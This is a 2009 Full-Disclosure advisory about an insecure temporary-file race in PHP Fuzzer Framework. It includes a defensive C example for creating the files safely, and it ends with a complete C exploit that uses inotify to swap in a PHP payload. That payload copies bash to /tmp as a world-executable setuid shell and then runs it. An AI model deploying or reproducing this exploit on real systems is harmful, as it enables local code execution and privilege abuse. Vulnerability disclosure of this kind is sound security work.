[Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability

PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability
I. BACKGROUND

PFF is a popular fuzzing suite developed by a team of highly
skilled developers at a classified government-funded information
security research center.
http://www.setec.org/~calcite/code/pff/

II. DESCRIPTION

Local exploitation of an insecure file creation method allows an
attacker to execute arbitrary code with the privileges of the user
running the affected application.

III. ANALYSIS

PFF writes its output files to a fixed default location before they
are run by the PHP interpreter. This location can be owned by another
user. An attacker can then use the window between creation of the
output file and execution of the file by the php binary to replace
the file with one containing the attacker's payload.

IV. DETECTION

All versions are affected.

V. WORKAROUND

Use a location not writable by another user for storage of PFF
output files.
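The workaround above is the whole fix: keep the output files out of any directory another user can write to, and refuse to run a file that was not created by the fuzzer itself. The following C program is an added example written for this page, not code from PFF or from the advisory. It shows the hardened creation pattern a fuzzer harness should use: a fresh per-run directory from mkdtemp() (mode 0700), an ownership and permission check on that directory before every use, and output files opened with O_CREAT|O_EXCL|O_NOFOLLOW so a pre-planted file or symlink makes the open fail instead of being silently reused. The function names, the "pff-XXXXXX" directory template and the sample output body are all assumptions made for the example.

```c
/* Added example (not from the advisory or from PFF): creating fuzzer
 * output files so that the race described in the advisory cannot be won.
 * Assumed names: check_private_dir, make_private_output_dir,
 * create_output_file, demo_secure_creation. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0   /* older platforms: lstat check below still applies */
#endif

/* Return 0 if dir is a real directory (not a symlink), owned by the
 * calling user and writable only by that user; -1 otherwise. */
int check_private_dir(const char *dir)
{
    struct stat st;
    if (lstat(dir, &st) != 0) return -1;
    if (!S_ISDIR(st.st_mode)) return -1;              /* symlink or plain file */
    if (st.st_uid != getuid()) return -1;             /* owned by someone else */
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return -1;  /* group/world writable */
    return 0;
}

/* Create a fresh private directory under $TMPDIR (default /tmp) and write
 * its path into buf. mkdtemp() picks an unused name and uses mode 0700.
 * Returns 0 on success, -1 on failure. */
int make_private_output_dir(char *buf, size_t buflen)
{
    const char *base = getenv("TMPDIR");
    if (base == NULL || *base == '\0') base = "/tmp";
    if (snprintf(buf, buflen, "%s/pff-XXXXXX", base) >= (int)buflen) return -1;
    if (mkdtemp(buf) == NULL) return -1;
    return check_private_dir(buf);
}

/* Open dir/name for writing. O_EXCL refuses a file that already exists
 * (e.g. one planted by another user) and O_NOFOLLOW refuses a symlink.
 * Returns the fd, or -1 with errno set. */
int create_output_file(const char *dir, const char *name)
{
    char path[4096];
    if (strchr(name, '/') != NULL) { errno = EINVAL; return -1; }  /* no traversal */
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, S_IRUSR | S_IWUSR);
}

/* Walk through the pattern once and verify each guard. Returns 0 when every
 * check behaves as expected, otherwise a small non-zero code naming the step. */
int demo_secure_creation(void)
{
    char dir[4096];
    const char *body = "<?php echo 'constructed fuzz case'; ?>\n";  /* sample content */
    int fd;

    if (make_private_output_dir(dir, sizeof dir) != 0) return 1;

    fd = create_output_file(dir, "fuzz0.php");
    if (fd < 0) return 2;
    if (write(fd, body, strlen(body)) != (ssize_t)strlen(body)) { close(fd); return 3; }
    close(fd);

    /* A second create of the same name must fail: the file is already there. */
    if (create_output_file(dir, "fuzz0.php") != -1 || errno != EEXIST) return 4;
    /* Names containing '/' are rejected before any filesystem access. */
    if (create_output_file(dir, "../escape.php") != -1) return 5;
    /* If the directory becomes group/world writable, the check rejects it. */
    if (chmod(dir, 0777) != 0) return 6;
    if (check_private_dir(dir) != -1) return 7;
    if (chmod(dir, 0700) != 0) return 8;
    if (check_private_dir(dir) != 0) return 9;

    printf("output directory %s passed all checks\n", dir);
    return 0;
}

int main(void)
{
    return demo_secure_creation();
}
```

The key point of the example is that the directory check happens every time before a file is created, not once at startup: the advisory's attack depends on the location being replaceable between creation and execution, and a fixed path under /tmp can never be made safe by checking it only once.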

VI. VENDOR RESPONSE

Vendor was uninterested in fixing the issue.


VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has not yet
assigned an identifier to this issue.

VIII. DISCLOSURE TIMELINE

07/30/2009 10:01PM EST - Initial Contact
07/30/2009 10:05PM EST - Initial Vendor Reply
07/30/2009 10:06PM EST - Vendor expressed lack of interest in
fixing the issue.

IX. CREDIT

This vulnerability was discovered by abad1dea,
Melissa Elliott

Web:
http://www.0xabad1dea.net

IRC:
irc.smashthestack.org/#social/esper
---
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/
/*
 * cheddabay.c - Insecure file creation method in pff. Yields shell
 * with privileges of user executing pff.
 *
 * Shouts to irc.smashthestack.org/#social.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>

#define FILEA "/tmp/PFF/fuzz0.php"   /* default PFF output file */
#define FILEB "/tmp/fuzzlol.php"     /* attacker-controlled replacement */
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)

int main(int argc, char *argv[])
{
    int f, n, w;
    char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
    struct inotify_event e;

    n = inotify_init();
    printf("-= pff race initialized =-\n");
    /* Stage the payload in a file owned by the attacker. */
    if ((f = open(FILEB, O_CREAT | O_RDWR | O_EXCL, MODEZ)) >= 0) {
        write(f, s, strlen(s));
        close(f);
    }
    printf("[+] created arbitrary code: %s\n", FILEB);
    /* Wait for PFF to create its output file, then swap the payload in
     * during the window before the php interpreter runs it. */
    w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
    read(n, &e, sizeof(e));
    rename(FILEB, FILEA);
    printf("[+] %s => %s\n", FILEB, FILEA);
    printf("[+] executing arbitrary code\n");
    sleep(2);
    printf("[+] race complete\n");
    execl("/tmp/sh", "/tmp/sh", (char *)NULL);
    return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/